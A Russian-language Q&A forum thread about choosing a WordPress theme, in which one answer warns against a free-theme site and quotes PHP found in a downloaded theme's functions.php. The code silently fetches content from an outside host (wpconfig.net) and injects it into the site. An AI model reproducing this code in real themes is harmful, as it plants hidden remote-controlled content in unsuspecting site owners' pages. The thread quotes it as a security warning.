sergeyvidioreg
@sergeyvidioreg

Как выбрать Шаблон на WP?

Всем привет! Мне очень интересна тема создания собственного сайта. За последние несколько месяцев прочитал много информации по установке шаблонов, базовому программированию, интернет-рекламе, usability и т.д.
В итоге выбрал WP CMS, так как она очень проста в использовании и допиливании.
На wp-templates.ru довольно большое количество шаблонов и по фронту многие выглядят привлекательно, но я потратил сутки на поиск и сильно залип в них.
Теперь к сути вопроса: Подскажите пожалуйста какой из них проще и лучше использовать для выкладки фото и видеоконтента (занимаюсь съемкой мероприятий с квадрокоптера).
Заранее благодарю
  • Вопрос задан
  • 216 просмотров
Пригласить эксперта
Ответы на вопрос 6
dimasmagadan
@dimasmagadan
несколько правил для уменьшения проблем в дальнейшей работе:
1 не качать шаблоны с непонятных сайтов
2 качать шаблон с официального репозитория, покупать шаблон у официального продавца, либо (если умеете) делать его самому.

почему так:
https://roem.ru/25-08-2014/109498/bolshe-poloviny-...

в остальном принципиальной разницы брать именно какой-то шаблон нет: любой шаблон можно заточить конкретно под вашу тематику.

конкретно по сайту wp-templates.ru
скачал произвольный шаблон с их главной страницы (качал шаблон Cardio). в файле functions.php есть вот такой код
class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_socket_timeout    = 5;

    function get_remote() {
        $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
        $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

        $links_class = new Get_links();
        $host = $links_class->host;
        $path = $links_class->path;
        $_socket_timeout = $links_class->_socket_timeout;
        //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                        "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

         $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
        return '<!--link error-->';
    }
}

позволяет получить удаленный доступ к вашему сайту.

ничего не мешает использовать такие сайты для подбора подходящего шаблона.
но на свой сайт устанавливать лучше копию с официального репозитория.

ну или обращайтесь ко мне - за небольшие деньги почищу шаблон от дыр/ссылок, либо позже за уже несколько большую сумму почищу от вирусов)
Но лучше, повторюсь, сразу же качайте ровно этот же шаблон с официального репозитория бесплатно
Ответ написан
@lere
Обязательно любую скачаную тему проверьте плагином TAC.
Ответ написан
Комментировать
twix007
@twix007
найти на темфорест или кодеканьйоне по тегам и меткам
Ответ написан
Комментировать
sergeyvidioreg
@sergeyvidioreg Автор вопроса
Boyko, по категории я в первую очередь прошелся) Суть вопроса-может какой-нибудь определенный шаблон посоветуете?
Ответ написан
Комментировать
Punkie
@Punkie
Выбор конкретного шаблона - задача исключительно индивидуальная и на 100% зависит от ваших вкусовых предпочтений.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы